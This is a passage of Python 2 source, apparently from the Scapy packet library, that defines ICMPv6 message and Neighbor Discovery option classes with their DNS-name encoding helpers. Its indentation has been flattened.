XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# tous les messages MLD sont emis avec une adresse source lien-locale
# -> Y veiller dans le post_build si aucune n'est specifiee
# La valeur de Hop-Limit doit etre de 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return (
inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
)
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# implementer le hashret et le answers
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revoir le coup du ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# Faire un post_build pour le recalcul de la taille (en multiple de 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
# described in section 3.1 of RFC 1035
# XXX Label should be at most 63 octets in length : we do not enforce it
# Total length of domain should be 255 : we do not enforce it either
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, fld=None, length_from=None, padded=False):
self.padded = padded
StrLenField.__init__(self, name, default, fld, length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and x[0] != '\x00':
l = ord(x[0])
cur.append(x[1:l+1])
x = x[l+1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and x[0] == '\x00':
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and z[-1] == '\x00':
return z
return z+'\x00'
# Build the encode names
tmp = map(lambda y: map((lambda z: chr(len(z))+z), y.split('.')), x)
ret_string = "".join(map(lambda x: conditionalTrailingDot("".join(x)), tmp))
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += "\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
return ret_string
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x/8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Options requises : source lladdr et target lladdr
# Autres options valides : source address list, MTU
# - Comme precise dans le document, il serait bien de prendre l'adresse L2
# demandee dans l'option requise target lladdr et l'utiliser au niveau
# de l'adresse destination ethernet si aucune adresse n'est precisee
# - ca semble pas forcement pratique si l'utilisateur doit preciser toutes
# les options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Options requises : target lladdr, target address list
# Autres options valides : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept like it has been provided. At the moment, i2repr() will
# crash on many inputs
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompresiion in
# dnsrepr2names(). Should be deactivable.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group Address. Can take a FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
# Here is the deal. First, that protocol is a piece of shit. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specifc
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overriden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overriden
# - Name in the other cases: code is set to 0, if not overriden by user
#
# Internal storage, is not only the value, but the a pair providing
# the type and the value (1 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Take as input a DNS encoded string (possibly compressed)
and returns a list of DNS names contained in it.
If provided string is already in printable format
(does not end with a null character, a one element list
is returned). Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if x is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknow qtype value are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decode it for user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET6, y), tmp))
elif t == 4:
return s + "".join(map(lambda (x,y): struct.pack("!I", x)+inet_pton(socket.AF_INET, y), tmp))
else:
return s + tmp
def getfield(self, pkt, s):
code = getattr(pkt, "code")
if code != 0:
return s, (0, "")
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
elif qtype == 2:
if len(s) < 4:
return s, (0, "")
ttl = struct.unpack("!I", s[:4])[0]
return "", (2, [ttl, s[4:]])
elif qtype == 3: # IPv6 addresses with TTLs
# XXX TODO : get the real length
res = []
while len(s) >= 20: # 4 + 16
ttl = struct.unpack("!I", s[:4])[0]
ip = inet_ntop(socket.AF_INET6, s[4:20])
res.append((ttl, ip))
